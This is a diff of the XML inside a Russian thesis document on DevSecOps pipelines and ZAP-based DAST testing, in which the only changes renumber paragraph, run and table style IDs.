--- a/diplom/PenTest/diplom_pt_ver2.docx
+++ b/diplom/PenTest/diplom_pt_ver2.docx
@@ -4,7 +4,7 @@
   <w:body>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -27,7 +27,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -50,7 +50,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -73,7 +73,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -96,7 +96,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -119,7 +119,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -142,7 +142,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -165,7 +165,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -188,7 +188,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -211,7 +211,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -234,7 +234,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -257,7 +257,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -281,7 +281,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -305,7 +305,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -329,7 +329,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -352,7 +352,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -375,7 +375,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -398,7 +398,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -421,7 +421,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -444,7 +444,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -467,7 +467,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -490,7 +490,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -513,7 +513,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -536,7 +536,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -559,7 +559,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:jc w:val="right"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -583,7 +583,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:jc w:val="right"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -608,7 +608,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:jc w:val="right"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -633,7 +633,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="957"/>
+        <w:pStyle w:val="967"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -666,7 +666,7 @@
       <w:sdtContent>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="966"/>
+            <w:pStyle w:val="976"/>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             </w:rPr>
@@ -696,7 +696,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="967"/>
+            <w:pStyle w:val="977"/>
             <w:tabs>
               <w:tab w:val="clear" w:pos="9345" w:leader="none"/>
               <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
@@ -713,14 +713,14 @@
           </w:r>
           <w:r>
             <w:rPr>
-              <w:rStyle w:val="940"/>
+              <w:rStyle w:val="950"/>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             </w:rPr>
             <w:instrText xml:space="preserve"> TOC \z \o "1-3" \u \h</w:instrText>
           </w:r>
           <w:r>
             <w:rPr>
-              <w:rStyle w:val="940"/>
+              <w:rStyle w:val="950"/>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
@@ -728,7 +728,7 @@
           <w:hyperlink w:tooltip="#__RefHeading___Toc95_1065274009" w:anchor="__RefHeading___Toc95_1065274009" w:history="1">
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="940"/>
+                <w:rStyle w:val="950"/>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
               <w:t xml:space="preserve">Введение</w:t>
@@ -749,7 +749,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="967"/>
+            <w:pStyle w:val="977"/>
             <w:tabs>
               <w:tab w:val="clear" w:pos="9345" w:leader="none"/>
               <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
@@ -766,7 +766,7 @@
           <w:hyperlink w:tooltip="#__RefHeading___Toc97_1065274009" w:anchor="__RefHeading___Toc97_1065274009" w:history="1">
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="940"/>
+                <w:rStyle w:val="950"/>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
               <w:t xml:space="preserve">1 Концепция Shift Left</w:t>
@@ -787,7 +787,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="967"/>
+            <w:pStyle w:val="977"/>
             <w:tabs>
               <w:tab w:val="clear" w:pos="9345" w:leader="none"/>
               <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
@@ -804,7 +804,7 @@
           <w:hyperlink w:tooltip="#__RefHeading___Toc99_1065274009" w:anchor="__RefHeading___Toc99_1065274009" w:history="1">
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="940"/>
+                <w:rStyle w:val="950"/>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
               <w:t xml:space="preserve">2 Структура DevSecOps-пайплайна</w:t>
@@ -825,7 +825,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="972"/>
+            <w:pStyle w:val="982"/>
             <w:tabs>
               <w:tab w:val="clear" w:pos="708" w:leader="none"/>
               <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
@@ -842,7 +842,7 @@
           <w:hyperlink w:tooltip="#__RefHeading___Toc101_1065274009" w:anchor="__RefHeading___Toc101_1065274009" w:history="1">
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="940"/>
+                <w:rStyle w:val="950"/>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
               <w:t xml:space="preserve">2.1 Pre-commit проверки</w:t>
@@ -863,7 +863,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="972"/>
+            <w:pStyle w:val="982"/>
             <w:tabs>
               <w:tab w:val="clear" w:pos="708" w:leader="none"/>
               <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
@@ -880,7 +880,7 @@
           <w:hyperlink w:tooltip="#__RefHeading___Toc103_1065274009" w:anchor="__RefHeading___Toc103_1065274009" w:history="1">
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="940"/>
+                <w:rStyle w:val="950"/>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
               <w:t xml:space="preserve">2.2 Pre-build проверки</w:t>
@@ -901,7 +901,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="972"/>
+            <w:pStyle w:val="982"/>
             <w:tabs>
               <w:tab w:val="clear" w:pos="708" w:leader="none"/>
               <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
@@ -918,7 +918,7 @@
           <w:hyperlink w:tooltip="#__RefHeading___Toc105_1065274009" w:anchor="__RefHeading___Toc105_1065274009" w:history="1">
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="940"/>
+                <w:rStyle w:val="950"/>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
               <w:t xml:space="preserve">2.3 Test-time проверка DAST</w:t>
@@ -939,7 +939,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="972"/>
+            <w:pStyle w:val="982"/>
             <w:tabs>
               <w:tab w:val="clear" w:pos="708" w:leader="none"/>
               <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
@@ -956,7 +956,7 @@
           <w:hyperlink w:tooltip="#__RefHeading___Toc329_367963048" w:anchor="__RefHeading___Toc329_367963048" w:history="1">
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="940"/>
+                <w:rStyle w:val="950"/>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
               <w:t xml:space="preserve">2.4 Post-deploy проверки</w:t>
@@ -966,7 +966,7 @@
           </w:hyperlink>
           <w:r>
             <w:rPr>
-              <w:rStyle w:val="940"/>
+              <w:rStyle w:val="950"/>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             </w:rPr>
             <w:fldChar w:fldCharType="end"/>
@@ -986,7 +986,7 @@
     </w:sdt>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:jc w:val="left"/>
         <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
         <w:rPr>
@@ -1012,7 +1012,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="885"/>
+        <w:pStyle w:val="895"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="2"/>
@@ -1053,7 +1053,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="885"/>
+        <w:pStyle w:val="895"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="0"/>
@@ -1197,7 +1197,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:jc w:val="left"/>
         <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
         <w:rPr>
@@ -1222,7 +1222,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="885"/>
+        <w:pStyle w:val="895"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="3"/>
@@ -1263,7 +1263,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="885"/>
+        <w:pStyle w:val="895"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
@@ -1341,7 +1341,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="974"/>
+        <w:pStyle w:val="984"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="6"/>
@@ -1375,7 +1375,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="974"/>
+        <w:pStyle w:val="984"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="6"/>
@@ -1443,7 +1443,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="974"/>
+        <w:pStyle w:val="984"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="6"/>
@@ -1517,7 +1517,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="886"/>
+        <w:pStyle w:val="896"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="5"/>
@@ -1569,7 +1569,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="758"/>
+        <w:tblStyle w:val="768"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
@@ -2603,7 +2603,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="886"/>
+        <w:pStyle w:val="896"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="5"/>
@@ -2714,7 +2714,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="758"/>
+        <w:tblStyle w:val="768"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
@@ -3445,7 +3445,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="886"/>
+        <w:pStyle w:val="896"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="0"/>
@@ -3536,7 +3536,7 @@
       <w:hyperlink r:id="rId12" w:tooltip="http://92.51.39.106:7799/" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             <w:highlight w:val="none"/>
           </w:rPr>
@@ -3594,7 +3594,7 @@
       <w:hyperlink r:id="rId13" w:tooltip="http://92.51.39.106:7799/" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             <w:highlight w:val="none"/>
           </w:rPr>
@@ -3682,7 +3682,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:jc w:val="left"/>
         <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
         <w:rPr>
@@ -3711,7 +3711,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="885"/>
+        <w:pStyle w:val="895"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
@@ -3752,7 +3752,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -3767,7 +3767,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -3782,7 +3782,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -3797,7 +3797,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -3812,7 +3812,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -3827,7 +3827,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:ind w:firstLine="851"/>
         <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
         <w:rPr>
@@ -3852,7 +3852,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="886"/>
+        <w:pStyle w:val="896"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="4"/>
@@ -4525,7 +4525,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="886"/>
+        <w:pStyle w:val="896"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="4"/>
@@ -4823,7 +4823,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="886"/>
+        <w:pStyle w:val="896"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="4"/>
@@ -4913,7 +4913,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="758"/>
+        <w:tblStyle w:val="768"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
@@ -5511,7 +5511,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="758"/>
+        <w:tblStyle w:val="768"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
@@ -5653,7 +5653,7 @@
             <w:hyperlink r:id="rId14" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#40026" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -5764,7 +5764,7 @@
             <w:hyperlink r:id="rId15" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#40014" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -5875,7 +5875,7 @@
             <w:hyperlink r:id="rId16" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#40012" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -5986,7 +5986,7 @@
             <w:hyperlink r:id="rId17" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#40018" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -6097,7 +6097,7 @@
             <w:hyperlink r:id="rId18" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#40019" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -6208,7 +6208,7 @@
             <w:hyperlink r:id="rId19" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#43" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -6319,7 +6319,7 @@
             <w:hyperlink r:id="rId20" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10202" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -6431,7 +6431,7 @@
             <w:hyperlink r:id="rId21" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#20012" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -6545,7 +6545,7 @@
             <w:hyperlink r:id="rId22" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10038" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -6659,7 +6659,7 @@
             <w:hyperlink r:id="rId23" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10020" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -6773,7 +6773,7 @@
             <w:hyperlink r:id="rId24" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10051" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -6887,7 +6887,7 @@
             <w:hyperlink r:id="rId25" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10010" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -7001,7 +7001,7 @@
             <w:hyperlink r:id="rId26" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10054" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -7115,7 +7115,7 @@
             <w:hyperlink r:id="rId27" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10009" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
